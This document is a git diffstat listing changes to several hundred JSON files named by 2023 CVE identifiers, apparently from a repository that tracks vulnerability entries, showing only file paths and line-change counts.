2023/CVE-2023-28324.json | 3 +- 2023/CVE-2023-28329.json | 3 +- 2023/CVE-2023-2833.json | 3 +- 2023/CVE-2023-28330.json | 3 +- 2023/CVE-2023-28343.json | 9 +- 2023/CVE-2023-28432.json | 57 +- 2023/CVE-2023-28434.json | 3 +- 2023/CVE-2023-28447.json | 3 +- 2023/CVE-2023-28467.json | 3 +- 2023/CVE-2023-28588.json | 18 +- 2023/CVE-2023-2859.json | 3 +- 2023/CVE-2023-2868.json | 9 +- 2023/CVE-2023-28753.json | 3 +- 2023/CVE-2023-2877.json | 3 +- 2023/CVE-2023-28771.json | 3 +- 2023/CVE-2023-28772.json | 9 +- 2023/CVE-2023-28810.json | 3 +- 2023/CVE-2023-29007.json | 9 +- 2023/CVE-2023-29017.json | 6 +- 2023/CVE-2023-29084.json | 3 +- 2023/CVE-2023-2916.json | 3 +- 2023/CVE-2023-2928.json | 3 +- 2023/CVE-2023-29324.json | 3 +- 2023/CVE-2023-29336.json | 3 +- 2023/CVE-2023-29343.json | 3 +- 2023/CVE-2023-29357.json | 34 +- 2023/CVE-2023-29360.json | 6 +- 2023/CVE-2023-29384.json | 3 +- 2023/CVE-2023-29406.json | 3 +- 2023/CVE-2023-29409.json | 3 +- 2023/CVE-2023-29439.json | 3 +- 2023/CVE-2023-29478.json | 3 +- 2023/CVE-2023-29489.json | 57 +- 2023/CVE-2023-2951.json | 3 +- 2023/CVE-2023-29808.json | 3 +- 2023/CVE-2023-29809.json | 3 +- 2023/CVE-2023-2982.json | 12 +- 2023/CVE-2023-29839.json | 3 +- 2023/CVE-2023-2986.json | 6 +- 2023/CVE-2023-29919.json | 3 +- 2023/CVE-2023-29922.json | 3 +- 2023/CVE-2023-29923.json | 9 +- 2023/CVE-2023-29929.json | 3 +- 2023/CVE-2023-29930.json | 3 +- 2023/CVE-2023-29983.json | 3 +- 2023/CVE-2023-30033.json | 3 +- 2023/CVE-2023-3009.json | 3 +- 2023/CVE-2023-30092.json | 3 +- 2023/CVE-2023-30145.json | 3 +- 2023/CVE-2023-30146.json | 3 +- 2023/CVE-2023-30185.json | 3 +- 2023/CVE-2023-30190.json | 3 +- 2023/CVE-2023-30212.json | 48 +- 2023/CVE-2023-30226.json | 3 +- 2023/CVE-2023-30253.json | 21 +- 2023/CVE-2023-30256.json | 3 +- 2023/CVE-2023-30258.json | 3 +- 2023/CVE-2023-30347.json | 3 +- 2023/CVE-2023-30367.json | 3 +- 2023/CVE-2023-30383.json | 3 +- 2023/CVE-2023-30458.json | 3 +- 2023/CVE-2023-30459.json | 3 +- 2023/CVE-2023-3047.json | 6 +- 2023/CVE-2023-30486.json | 3 +- 2023/CVE-2023-30533.json | 3 +- 2023/CVE-2023-30547.json | 12 +- 2023/CVE-2023-3076.json | 3 +- 2023/CVE-2023-30765.json | 3 +- 2023/CVE-2023-30777.json | 3 +- 2023/CVE-2023-3079.json | 3 +- 2023/CVE-2023-30800.json | 12 +- 2023/CVE-2023-30839.json | 3 +- 2023/CVE-2023-30845.json | 3 +- 2023/CVE-2023-30854.json | 3 +- 2023/CVE-2023-30943.json | 9 +- 2023/CVE-2023-31070.json | 3 +- 2023/CVE-2023-3124.json | 3 +- 2023/CVE-2023-31290.json | 3 +- 2023/CVE-2023-31320.json | 3 +- 2023/CVE-2023-31346.json | 3 +- 2023/CVE-2023-31355.json | 3 +- 2023/CVE-2023-31419.json | 6 +- 2023/CVE-2023-31433.json | 3 +- 2023/CVE-2023-31434.json | 3 +- 2023/CVE-2023-31435.json | 3 +- 2023/CVE-2023-31443.json | 3 +- 2023/CVE-2023-31445.json | 3 +- 2023/CVE-2023-31446.json | 3 +- 2023/CVE-2023-31497.json | 3 +- 2023/CVE-2023-31541.json | 3 +- 2023/CVE-2023-31546.json | 3 +- 2023/CVE-2023-31584.json | 3 +- 2023/CVE-2023-31594.json | 3 +- 2023/CVE-2023-31595.json | 3 +- 2023/CVE-2023-31606.json | 3 +- 2023/CVE-2023-3163.json | 3 +- 2023/CVE-2023-31634.json | 3 +- 2023/CVE-2023-31664.json | 3 +- 2023/CVE-2023-31702.json | 3 +- 2023/CVE-2023-31703.json | 3 +- 2023/CVE-2023-31704.json | 3 +- 2023/CVE-2023-31705.json | 3 +- 2023/CVE-2023-31711.json | 3 +- 2023/CVE-2023-31714.json | 3 +- 2023/CVE-2023-31716.json | 3 +- 2023/CVE-2023-31717.json | 3 +- 2023/CVE-2023-31718.json | 3 +- 2023/CVE-2023-31719.json | 3 +- 2023/CVE-2023-31726.json | 3 +- 2023/CVE-2023-31747.json | 3 +- 2023/CVE-2023-31753.json | 3 +- 2023/CVE-2023-31756.json | 3 +- 2023/CVE-2023-31779.json | 3 +- 2023/CVE-2023-31851.json | 3 +- 2023/CVE-2023-31852.json | 3 +- 2023/CVE-2023-31853.json | 3 +- 2023/CVE-2023-32031.json | 3 +- 2023/CVE-2023-32073.json | 3 +- 2023/CVE-2023-32117.json | 3 +- 2023/CVE-2023-32162.json | 3 +- 2023/CVE-2023-32163.json | 3 +- 2023/CVE-2023-32233.json | 15 +- 2023/CVE-2023-32235.json | 3 +- 2023/CVE-2023-32243.json | 30 +- 2023/CVE-2023-32314.json | 3 +- 2023/CVE-2023-32315.json | 30 +- 2023/CVE-2023-32353.json | 3 +- 2023/CVE-2023-32364.json | 3 +- 2023/CVE-2023-32407.json | 3 +- 2023/CVE-2023-32422.json | 3 +- 2023/CVE-2023-3244.json | 3 +- 2023/CVE-2023-32560.json | 6 +- 2023/CVE-2023-32571.json | 6 +- 2023/CVE-2023-32629.json | 12 +- 2023/CVE-2023-32681.json | 3 +- 2023/CVE-2023-3269.json | 3 +- 2023/CVE-2023-32707.json | 3 +- 2023/CVE-2023-32749.json | 3 +- 2023/CVE-2023-32784.json | 30 +- 2023/CVE-2023-32961.json | 3 +- 2023/CVE-2023-33105.json | 3 +- 2023/CVE-2023-33242.json | 3 +- 2023/CVE-2023-33243.json | 3 +- 2023/CVE-2023-33246.json | 39 +- 2023/CVE-2023-33253.json | 3 +- 2023/CVE-2023-33264.json | 9 +- 2023/CVE-2023-3338.json | 3 +- 2023/CVE-2023-33381.json | 3 +- 2023/CVE-2023-33404.json | 3 +- 2023/CVE-2023-33405.json | 3 +- 2023/CVE-2023-33408.json | 3 +- 2023/CVE-2023-33409.json | 3 +- 2023/CVE-2023-33410.json | 3 +- 2023/CVE-2023-33476.json | 3 +- 2023/CVE-2023-33477.json | 3 +- 2023/CVE-2023-33517.json | 3 +- 2023/CVE-2023-33580.json | 3 +- 2023/CVE-2023-33592.json | 3 +- 2023/CVE-2023-33617.json | 6 +- 2023/CVE-2023-33668.json | 3 +- 2023/CVE-2023-33669.json | 3 +- 2023/CVE-2023-33730.json | 3 +- 2023/CVE-2023-33731.json | 3 +- 2023/CVE-2023-33732.json | 3 +- 2023/CVE-2023-33733.json | 15 +- 2023/CVE-2023-33747.json | 3 +- 2023/CVE-2023-33768.json | 6 +- 2023/CVE-2023-33781.json | 3 +- 2023/CVE-2023-33782.json | 3 +- 2023/CVE-2023-33802.json | 3 +- 2023/CVE-2023-33817.json | 3 +- 2023/CVE-2023-33829.json | 6 +- 2023/CVE-2023-33831.json | 6 +- 2023/CVE-2023-3390.json | 3 +- 2023/CVE-2023-33902.json | 3 +- 2023/CVE-2023-33977.json | 3 +- 2023/CVE-2023-34034.json | 3 +- 2023/CVE-2023-34035.json | 6 +- 2023/CVE-2023-34039.json | 15 +- 2023/CVE-2023-34040.json | 12 +- 2023/CVE-2023-34050.json | 3 +- 2023/CVE-2023-34051.json | 3 +- 2023/CVE-2023-34092.json | 3 +- 2023/CVE-2023-34096.json | 3 +- 2023/CVE-2023-34152.json | 6 +- 2023/CVE-2023-34212.json | 3 +- 2023/CVE-2023-34312.json | 6 +- 2023/CVE-2023-34362.json | 30 +- 2023/CVE-2023-34458.json | 9 +- 2023/CVE-2023-34468.json | 3 +- 2023/CVE-2023-3450.json | 6 +- 2023/CVE-2023-3452.json | 3 +- 2023/CVE-2023-34537.json | 3 +- 2023/CVE-2023-34584.json | 3 +- 2023/CVE-2023-34598.json | 6 +- 2023/CVE-2023-34599.json | 3 +- 2023/CVE-2023-3460.json | 24 +- 2023/CVE-2023-34600.json | 3 +- 2023/CVE-2023-34634.json | 3 +- 2023/CVE-2023-34830.json | 3 +- 2023/CVE-2023-34835.json | 3 +- 2023/CVE-2023-34836.json | 3 +- 2023/CVE-2023-34837.json | 3 +- 2023/CVE-2023-34838.json | 3 +- 2023/CVE-2023-34839.json | 3 +- 2023/CVE-2023-34840.json | 3 +- 2023/CVE-2023-34843.json | 3 +- 2023/CVE-2023-34845.json | 3 +- 2023/CVE-2023-34852.json | 3 +- 2023/CVE-2023-34853.json | 3 +- 2023/CVE-2023-34924.json | 3 +- 2023/CVE-2023-34960.json | 21 +- 2023/CVE-2023-34965.json | 3 +- 2023/CVE-2023-34992.json | 6 +- 2023/CVE-2023-35001.json | 9 +- 2023/CVE-2023-35078.json | 21 +- 2023/CVE-2023-35080.json | 3 +- 2023/CVE-2023-35082.json | 3 +- 2023/CVE-2023-35086.json | 3 +- 2023/CVE-2023-3519.json | 39 +- 2023/CVE-2023-35636.json | 3 +- 2023/CVE-2023-35671.json | 3 +- 2023/CVE-2023-35674.json | 6 +- 2023/CVE-2023-35687.json | 3 +- 2023/CVE-2023-35744.json | 3 +- 2023/CVE-2023-35793.json | 3 +- 2023/CVE-2023-35794.json | 3 +- 2023/CVE-2023-35801.json | 3 +- 2023/CVE-2023-35803.json | 3 +- 2023/CVE-2023-35813.json | 6 +- 2023/CVE-2023-35828.json | 3 +- 2023/CVE-2023-35840.json | 3 +- 2023/CVE-2023-35843.json | 6 +- 2023/CVE-2023-35844.json | 3 +- 2023/CVE-2023-35854.json | 3 +- 2023/CVE-2023-35885.json | 6 +- 2023/CVE-2023-35985.json | 6 +- 2023/CVE-2023-36003.json | 6 +- 2023/CVE-2023-36025.json | 9 +- 2023/CVE-2023-36076.json | 3 +- 2023/CVE-2023-36085.json | 3 +- 2023/CVE-2023-36109.json | 3 +- 2023/CVE-2023-36123.json | 3 +- 2023/CVE-2023-36143.json | 6 +- 2023/CVE-2023-36144.json | 3 +- 2023/CVE-2023-36146.json | 3 +- 2023/CVE-2023-36158.json | 3 +- 2023/CVE-2023-36159.json | 3 +- 2023/CVE-2023-36163.json | 3 +- 2023/CVE-2023-36164.json | 3 +- 2023/CVE-2023-36165.json | 3 +- 2023/CVE-2023-36168.json | 3 +- 2023/CVE-2023-36169.json | 3 +- 2023/CVE-2023-36250.json | 3 +- 2023/CVE-2023-36281.json | 9 +- 2023/CVE-2023-36319.json | 3 +- 2023/CVE-2023-3640.json | 3 +- 2023/CVE-2023-36407.json | 6 +- 2023/CVE-2023-36424.json | 3 +- 2023/CVE-2023-36427.json | 3 +- 2023/CVE-2023-36531.json | 3 +- 2023/CVE-2023-36643.json | 3 +- 2023/CVE-2023-36644.json | 3 +- 2023/CVE-2023-36645.json | 3 +- 2023/CVE-2023-36664.json | 12 +- 2023/CVE-2023-36723.json | 3 +- 2023/CVE-2023-36745.json | 3 +- 2023/CVE-2023-36802.json | 15 +- 2023/CVE-2023-36812.json | 3 +- 2023/CVE-2023-36844.json | 9 +- 2023/CVE-2023-36845.json | 57 +- 2023/CVE-2023-36846.json | 3 +- 2023/CVE-2023-36874.json | 12 +- 2023/CVE-2023-36884.json | 27 +- 2023/CVE-2023-36899.json | 6 +- 2023/CVE-2023-36900.json | 3 +- 2023/CVE-2023-37073.json | 3 +- 2023/CVE-2023-3710.json | 3 +- 2023/CVE-2023-3711.json | 3 +- 2023/CVE-2023-3712.json | 3 +- 2023/CVE-2023-37164.json | 3 +- 2023/CVE-2023-37189.json | 3 +- 2023/CVE-2023-37190.json | 3 +- 2023/CVE-2023-37191.json | 3 +- 2023/CVE-2023-37250.json | 3 +- 2023/CVE-2023-37474.json | 3 +- 2023/CVE-2023-37478.json | 6 +- 2023/CVE-2023-37582.json | 3 +- 2023/CVE-2023-37596.json | 3 +- 2023/CVE-2023-37597.json | 3 +- 2023/CVE-2023-37598.json | 3 +- 2023/CVE-2023-37599.json | 3 +- 2023/CVE-2023-37621.json | 3 +- 2023/CVE-2023-37625.json | 3 +- 2023/CVE-2023-37739.json | 3 +- 2023/CVE-2023-37755.json | 3 +- 2023/CVE-2023-37756.json | 3 +- 2023/CVE-2023-37771.json | 3 +- 2023/CVE-2023-37772.json | 3 +- 2023/CVE-2023-37778.json | 3 +- 2023/CVE-2023-37779.json | 3 +- 2023/CVE-2023-37786.json | 3 +- 2023/CVE-2023-37790.json | 3 +- 2023/CVE-2023-37800.json | 3 +- 2023/CVE-2023-37903.json | 3 +- 2023/CVE-2023-37941.json | 3 +- 2023/CVE-2023-37979.json | 6 +- 2023/CVE-2023-38035.json | 9 +- 2023/CVE-2023-38039.json | 3 +- 2023/CVE-2023-38041.json | 3 +- 2023/CVE-2023-38120.json | 3 +- 2023/CVE-2023-38146.json | 9 +- 2023/CVE-2023-3824.json | 9 +- 2023/CVE-2023-3836.json | 3 +- 2023/CVE-2023-38408.json | 18 +- 2023/CVE-2023-38434.json | 3 +- 2023/CVE-2023-38490.json | 3 +- 2023/CVE-2023-38497.json | 3 +- 2023/CVE-2023-38499.json | 9 +- 2023/CVE-2023-38545.json | 27 +- 2023/CVE-2023-38571.json | 3 +- 2023/CVE-2023-38609.json | 3 +- 2023/CVE-2023-38632.json | 3 +- 2023/CVE-2023-38646.json | 105 ++-- 2023/CVE-2023-38709.json | 3 +- 2023/CVE-2023-38743.json | 3 +- 2023/CVE-2023-3881.json | 3 +- 2023/CVE-2023-38817.json | 3 +- 2023/CVE-2023-38820.json | 3 +- 2023/CVE-2023-38821.json | 3 +- 2023/CVE-2023-38822.json | 3 +- 2023/CVE-2023-38829.json | 3 +- 2023/CVE-2023-38831.json | 207 +++---- 2023/CVE-2023-38836.json | 3 +- 2023/CVE-2023-38840.json | 3 +- 2023/CVE-2023-38890.json | 3 +- 2023/CVE-2023-38891.json | 3 +- 2023/CVE-2023-3897.json | 3 +- 2023/CVE-2023-39024.json | 3 +- 2023/CVE-2023-39062.json | 3 +- 2023/CVE-2023-39063.json | 3 +- 2023/CVE-2023-39115.json | 3 +- 2023/CVE-2023-39144.json | 3 +- 2023/CVE-2023-39320.json | 3 +- 2023/CVE-2023-39361.json | 3 +- 2023/CVE-2023-39362.json | 6 +- 2023/CVE-2023-39526.json | 3 +- 2023/CVE-2023-39539.json | 3 +- 2023/CVE-2023-39593.json | 3 +- 2023/CVE-2023-39707.json | 3 +- 2023/CVE-2023-39708.json | 3 +- 2023/CVE-2023-39709.json | 3 +- 2023/CVE-2023-3971.json | 3 +- 2023/CVE-2023-39710.json | 3 +- 2023/CVE-2023-39711.json | 3 +- 2023/CVE-2023-39712.json | 3 +- 2023/CVE-2023-39714.json | 3 +- 2023/CVE-2023-39725.json | 3 +- 2023/CVE-2023-40000.json | 9 +- 2023/CVE-2023-40028.json | 3 +- 2023/CVE-2023-40031.json | 3 +- 2023/CVE-2023-40037.json | 3 +- 2023/CVE-2023-40044.json | 3 +- 2023/CVE-2023-40084.json | 3 +- 2023/CVE-2023-40109.json | 3 +- 2023/CVE-2023-40121.json | 6 +- 2023/CVE-2023-40127.json | 15 +- 2023/CVE-2023-40133.json | 3 +- 2023/CVE-2023-40140.json | 6 +- 2023/CVE-2023-40275.json | 3 +- 2023/CVE-2023-40276.json | 3 +- 2023/CVE-2023-40277.json | 3 +- 2023/CVE-2023-40278.json | 3 +- 2023/CVE-2023-40279.json | 3 +- 2023/CVE-2023-40280.json | 3 +- 2023/CVE-2023-40294.json | 3 +- 2023/CVE-2023-40296.json | 3 +- 2023/CVE-2023-40297.json | 3 +- 2023/CVE-2023-40361.json | 3 +- 2023/CVE-2023-40362.json | 3 +- 2023/CVE-2023-40404.json | 3 +- 2023/CVE-2023-40429.json | 3 +- 2023/CVE-2023-40459.json | 6 +- 2023/CVE-2023-40477.json | 6 +- 2023/CVE-2023-40600.json | 3 +- 2023/CVE-2023-40626.json | 3 +- 2023/CVE-2023-40868.json | 3 +- 2023/CVE-2023-40869.json | 3 +- 2023/CVE-2023-40924.json | 3 +- 2023/CVE-2023-40930.json | 3 +- 2023/CVE-2023-40931.json | 3 +- 2023/CVE-2023-40933.json | 3 +- 2023/CVE-2023-40989.json | 3 +- 2023/CVE-2023-41064.json | 9 +- 2023/CVE-2023-41080.json | 3 +- 2023/CVE-2023-41265.json | 3 +- 2023/CVE-2023-4128.json | 3 +- 2023/CVE-2023-41362.json | 3 +- 2023/CVE-2023-41425.json | 21 +- 2023/CVE-2023-41436.json | 3 +- 2023/CVE-2023-4145.json | 9 +- 2023/CVE-2023-41474.json | 3 +- 2023/CVE-2023-41507.json | 3 +- 2023/CVE-2023-41508.json | 3 +- 2023/CVE-2023-41533.json | 3 +- 2023/CVE-2023-41534.json | 3 +- 2023/CVE-2023-41535.json | 3 +- 2023/CVE-2023-41564.json | 3 +- 2023/CVE-2023-41575.json | 3 +- 2023/CVE-2023-41592.json | 9 +- 2023/CVE-2023-41593.json | 3 +- 2023/CVE-2023-41613.json | 3 +- 2023/CVE-2023-41623.json | 3 +- 2023/CVE-2023-41646.json | 3 +- 2023/CVE-2023-4165.json | 3 +- 2023/CVE-2023-4166.json | 3 +- 2023/CVE-2023-4169.json | 3 +- 2023/CVE-2023-41717.json | 3 +- 2023/CVE-2023-4174.json | 3 +- 2023/CVE-2023-41772.json | 3 +- 2023/CVE-2023-41892.json | 15 +- 2023/CVE-2023-4197.json | 3 +- 2023/CVE-2023-41991.json | 3 +- 2023/CVE-2023-41993.json | 15 +- 2023/CVE-2023-4206.json | 3 +- 2023/CVE-2023-42115.json | 3 +- 2023/CVE-2023-422.json | 3 +- 2023/CVE-2023-4220.json | 45 +- 2023/CVE-2023-42222.json | 3 +- 2023/CVE-2023-4226.json | 3 +- 2023/CVE-2023-42283.json | 3 +- 2023/CVE-2023-42284.json | 3 +- 2023/CVE-2023-42362.json | 3 +- 2023/CVE-2023-42413.json | 3 +- 2023/CVE-2023-42426.json | 3 +- 2023/CVE-2023-42442.json | 9 +- 2023/CVE-2023-42468.json | 3 +- 2023/CVE-2023-42469.json | 3 +- 2023/CVE-2023-42470.json | 3 +- 2023/CVE-2023-42471.json | 3 +- 2023/CVE-2023-4278.json | 3 +- 2023/CVE-2023-42789.json | 3 +- 2023/CVE-2023-4279.json | 3 +- 2023/CVE-2023-42793.json | 33 +- 2023/CVE-2023-4281.json | 3 +- 2023/CVE-2023-42819.json | 3 +- 2023/CVE-2023-42820.json | 6 +- 2023/CVE-2023-42860.json | 3 +- 2023/CVE-2023-42931.json | 3 +- 2023/CVE-2023-4294.json | 3 +- 2023/CVE-2023-43040.json | 3 +- 2023/CVE-2023-43115.json | 3 +- 2023/CVE-2023-43144.json | 3 +- 2023/CVE-2023-43147.json | 3 +- 2023/CVE-2023-43148.json | 3 +- 2023/CVE-2023-43149.json | 3 +- 2023/CVE-2023-43154.json | 3 +- 2023/CVE-2023-43177.json | 3 +- 2023/CVE-2023-43208.json | 9 +- 2023/CVE-2023-43261.json | 3 +- 2023/CVE-2023-43263.json | 3 +- 2023/CVE-2023-43284.json | 3 +- 2023/CVE-2023-43317.json | 3 +- 2023/CVE-2023-43318.json | 3 +- 2023/CVE-2023-43323.json | 3 +- 2023/CVE-2023-43325.json | 3 +- 2023/CVE-2023-43326.json | 3 +- 2023/CVE-2023-43339.json | 3 +- 2023/CVE-2023-43340.json | 3 +- 2023/CVE-2023-43341.json | 3 +- 2023/CVE-2023-43342.json | 3 +- 2023/CVE-2023-43343.json | 3 +- 2023/CVE-2023-43344.json | 3 +- 2023/CVE-2023-43345.json | 3 +- 2023/CVE-2023-43346.json | 3 +- 2023/CVE-2023-43352.json | 3 +- 2023/CVE-2023-43353.json | 3 +- 2023/CVE-2023-43354.json | 3 +- 2023/CVE-2023-43355.json | 3 +- 2023/CVE-2023-43356.json | 3 +- 2023/CVE-2023-43357.json | 3 +- 2023/CVE-2023-43358.json | 3 +- 2023/CVE-2023-43359.json | 3 +- 2023/CVE-2023-43360.json | 3 +- 2023/CVE-2023-43364.json | 3 +- 2023/CVE-2023-43481.json | 3 +- 2023/CVE-2023-43482.json | 3 +- 2023/CVE-2023-43494.json | 3 +- 2023/CVE-2023-4357.json | 21 +- 2023/CVE-2023-43622.json | 3 +- 2023/CVE-2023-43646.json | 3 +- 2023/CVE-2023-43654.json | 6 +- 2023/CVE-2023-43667.json | 9 +- 2023/CVE-2023-43757.json | 3 +- 2023/CVE-2023-43770.json | 6 +- 2023/CVE-2023-43786.json | 3 +- 2023/CVE-2023-43838.json | 3 +- 2023/CVE-2023-43871.json | 3 +- 2023/CVE-2023-43872.json | 3 +- 2023/CVE-2023-43873.json | 3 +- 2023/CVE-2023-43874.json | 3 +- 2023/CVE-2023-43875.json | 3 +- 2023/CVE-2023-43876.json | 3 +- 2023/CVE-2023-43877.json | 3 +- 2023/CVE-2023-43878.json | 3 +- 2023/CVE-2023-43879.json | 3 +- 2023/CVE-2023-43955.json | 3 +- 2023/CVE-2023-44061.json | 3 +- 2023/CVE-2023-4427.json | 3 +- 2023/CVE-2023-44451.json | 3 +- 2023/CVE-2023-44452.json | 3 +- 2023/CVE-2023-44487.json | 39 +- 2023/CVE-2023-4450.json | 3 +- 2023/CVE-2023-4460.json | 3 +- 2023/CVE-2023-44758.json | 3 +- 2023/CVE-2023-44760.json | 3 +- 2023/CVE-2023-44761.json | 3 +- 2023/CVE-2023-44762.json | 3 +- 2023/CVE-2023-44763.json | 3 +- 2023/CVE-2023-44764.json | 3 +- 2023/CVE-2023-44765.json | 3 +- 2023/CVE-2023-44766.json | 3 +- 2023/CVE-2023-44767.json | 3 +- 2023/CVE-2023-44769.json | 3 +- 2023/CVE-2023-44770.json | 3 +- 2023/CVE-2023-44771.json | 3 +- 2023/CVE-2023-44811.json | 3 +- 2023/CVE-2023-44812.json | 3 +- 2023/CVE-2023-44813.json | 3 +- 2023/CVE-2023-44961.json | 3 +- 2023/CVE-2023-44962.json | 3 +- 2023/CVE-2023-44976.json | 3 +- 2023/CVE-2023-45158.json | 3 +- 2023/CVE-2023-45182.json | 3 +- 2023/CVE-2023-45184.json | 3 +- 2023/CVE-2023-45185.json | 3 +- 2023/CVE-2023-45239.json | 3 +- 2023/CVE-2023-45280.json | 9 +- 2023/CVE-2023-45288.json | 3 +- 2023/CVE-2023-4542.json | 3 +- 2023/CVE-2023-45471.json | 3 +- 2023/CVE-2023-4549.json | 3 +- 2023/CVE-2023-45503.json | 3 +- 2023/CVE-2023-45540.json | 3 +- 2023/CVE-2023-45542.json | 3 +- 2023/CVE-2023-45657.json | 3 +- 2023/CVE-2023-4568.json | 3 +- 2023/CVE-2023-45777.json | 3 +- 2023/CVE-2023-45779.json | 3 +- 2023/CVE-2023-45827.json | 3 +- 2023/CVE-2023-45828.json | 3 +- 2023/CVE-2023-45857.json | 9 +- 2023/CVE-2023-45866.json | 18 +- 2023/CVE-2023-4590.json | 3 +- 2023/CVE-2023-4596.json | 9 +- 2023/CVE-2023-45966.json | 3 +- 2023/CVE-2023-45992.json | 3 +- 2023/CVE-2023-46003.json | 3 +- 2023/CVE-2023-46012.json | 3 +- 2023/CVE-2023-46014.json | 3 +- 2023/CVE-2023-46015.json | 3 +- 2023/CVE-2023-46016.json | 3 +- 2023/CVE-2023-46017.json | 3 +- 2023/CVE-2023-46018.json | 3 +- 2023/CVE-2023-46019.json | 3 +- 2023/CVE-2023-46020.json | 3 +- 2023/CVE-2023-46021.json | 3 +- 2023/CVE-2023-46022.json | 3 +- 2023/CVE-2023-46197.json | 3 +- 2023/CVE-2023-4622.json | 3 +- 2023/CVE-2023-46303.json | 3 +- 2023/CVE-2023-46304.json | 3 +- 2023/CVE-2023-4631.json | 3 +- 2023/CVE-2023-4634.json | 3 +- 2023/CVE-2023-46344.json | 3 +- 2023/CVE-2023-4636.json | 3 +- 2023/CVE-2023-46371.json | 3 +- 2023/CVE-2023-46404.json | 3 +- 2023/CVE-2023-46442.json | 3 +- 2023/CVE-2023-46447.json | 3 +- 2023/CVE-2023-46449.json | 3 +- 2023/CVE-2023-46450.json | 3 +- 2023/CVE-2023-46451.json | 3 +- 2023/CVE-2023-46454.json | 3 +- 2023/CVE-2023-46474.json | 3 +- 2023/CVE-2023-46478.json | 3 +- 2023/CVE-2023-46480.json | 3 +- 2023/CVE-2023-46501.json | 3 +- 2023/CVE-2023-46604.json | 78 ++- 2023/CVE-2023-46615.json | 3 +- 2023/CVE-2023-46694.json | 3 +- 2023/CVE-2023-46747.json | 27 +- 2023/CVE-2023-46805.json | 24 +- 2023/CVE-2023-46813.json | 3 +- 2023/CVE-2023-46818.json | 3 +- 2023/CVE-2023-4683.json | 3 +- 2023/CVE-2023-46865.json | 3 +- 2023/CVE-2023-46870.json | 3 +- 2023/CVE-2023-46948.json | 3 +- 2023/CVE-2023-46954.json | 3 +- 2023/CVE-2023-4696.json | 3 +- 2023/CVE-2023-46974.json | 3 +- 2023/CVE-2023-4698.json | 3 +- 2023/CVE-2023-46980.json | 3 +- 2023/CVE-2023-4699.json | 3 +- 2023/CVE-2023-46998.json | 3 +- 2023/CVE-2023-47014.json | 3 +- 2023/CVE-2023-47102.json | 3 +- 2023/CVE-2023-47108.json | 3 +- 2023/CVE-2023-47119.json | 6 +- 2023/CVE-2023-47129.json | 3 +- 2023/CVE-2023-47179.json | 3 +- 2023/CVE-2023-47218.json | 3 +- 2023/CVE-2023-47246.json | 9 +- 2023/CVE-2023-47253.json | 6 +- 2023/CVE-2023-47355.json | 3 +- 2023/CVE-2023-47400.json | 3 +- 2023/CVE-2023-4741.json | 3 +- 2023/CVE-2023-47437.json | 3 +- 2023/CVE-2023-47459.json | 3 +- 2023/CVE-2023-47460.json | 3 +- 2023/CVE-2023-47464.json | 3 +- 2023/CVE-2023-47488.json | 3 +- 2023/CVE-2023-47489.json | 3 +- 2023/CVE-2023-47504.json | 3 +- 2023/CVE-2023-47529.json | 3 +- 2023/CVE-2023-47564.json | 3 +- 2023/CVE-2023-4762.json | 6 +- 2023/CVE-2023-47668.json | 3 +- 2023/CVE-2023-4771.json | 3 +- 2023/CVE-2023-47840.json | 3 +- 2023/CVE-2023-47882.json | 3 +- 2023/CVE-2023-47883.json | 3 +- 2023/CVE-2023-47889.json | 3 +- 2023/CVE-2023-4800.json | 3 +- 2023/CVE-2023-48022.json | 6 +- 2023/CVE-2023-48028.json | 3 +- 2023/CVE-2023-48029.json | 3 +- 2023/CVE-2023-48031.json | 3 +- 2023/CVE-2023-48034.json | 3 +- 2023/CVE-2023-48084.json | 6 +- 2023/CVE-2023-48104.json | 3 +- 2023/CVE-2023-48123.json | 3 +- 2023/CVE-2023-4813.json | 3 +- 2023/CVE-2023-48194.json | 3 +- 2023/CVE-2023-48197.json | 3 +- 2023/CVE-2023-48198.json | 3 +- 2023/CVE-2023-48199.json | 3 +- 2023/CVE-2023-48200.json | 3 +- 2023/CVE-2023-4863.json | 33 +- 2023/CVE-2023-48777.json | 3 +- 2023/CVE-2023-48788.json | 3 +- 2023/CVE-2023-48842.json | 3 +- 2023/CVE-2023-48849.json | 3 +- 2023/CVE-2023-48858.json | 3 +- 2023/CVE-2023-48866.json | 3 +- 2023/CVE-2023-48974.json | 3 +- 2023/CVE-2023-48981.json | 3 +- 2023/CVE-2023-48982.json | 3 +- 2023/CVE-2023-48983.json | 3 +- 2023/CVE-2023-49002.json | 3 +- 2023/CVE-2023-49003.json | 3 +- 2023/CVE-2023-49038.json | 3 +- 2023/CVE-2023-49052.json | 3 +- 2023/CVE-2023-49070.json | 18 +- 2023/CVE-2023-49103.json | 9 +- 2023/CVE-2023-49105.json | 3 +- 2023/CVE-2023-4911.json | 48 +- 2023/CVE-2023-49313.json | 3 +- 2023/CVE-2023-49314.json | 3 +- 2023/CVE-2023-49339.json | 3 +- 2023/CVE-2023-49438.json | 3 +- 2023/CVE-2023-49453.json | 3 +- 2023/CVE-2023-49471.json | 3 +- 2023/CVE-2023-49496.json | 3 +- 2023/CVE-2023-49539.json | 3 +- 2023/CVE-2023-49540.json | 3 +- 2023/CVE-2023-49543.json | 3 +- 2023/CVE-2023-49544.json | 3 +- 2023/CVE-2023-49545.json | 3 +- 2023/CVE-2023-49546.json | 3 +- 2023/CVE-2023-49547.json | 3 +- 2023/CVE-2023-49548.json | 3 +- 2023/CVE-2023-49606.json | 3 +- 2023/CVE-2023-4966.json | 39 +- 2023/CVE-2023-49950.json | 3 +- 2023/CVE-2023-49954.json | 3 +- 2023/CVE-2023-49964.json | 3 +- 2023/CVE-2023-49965.json | 3 +- 2023/CVE-2023-49968.json | 3 +- 2023/CVE-2023-49969.json | 3 +- 2023/CVE-2023-49970.json | 3 +- 2023/CVE-2023-49971.json | 3 +- 2023/CVE-2023-49973.json | 3 +- 2023/CVE-2023-49974.json | 3 +- 2023/CVE-2023-49976.json | 3 +- 2023/CVE-2023-49977.json | 3 +- 2023/CVE-2023-49978.json | 3 +- 2023/CVE-2023-49979.json | 3 +- 2023/CVE-2023-49980.json | 3 +- 2023/CVE-2023-49981.json | 3 +- 2023/CVE-2023-49982.json | 3 +- 2023/CVE-2023-49983.json | 3 +- 2023/CVE-2023-49984.json | 3 +- 2023/CVE-2023-49985.json | 3 +- 2023/CVE-2023-49986.json | 3 +- 2023/CVE-2023-49987.json | 3 +- 2023/CVE-2023-49988.json | 3 +- 2023/CVE-2023-49989.json | 3 +- 2023/CVE-2023-50029.json | 3 +- 2023/CVE-2023-50070.json | 3 +- 2023/CVE-2023-50071.json | 3 +- 2023/CVE-2023-50072.json | 3 +- 2023/CVE-2023-50131.json | 3 +- 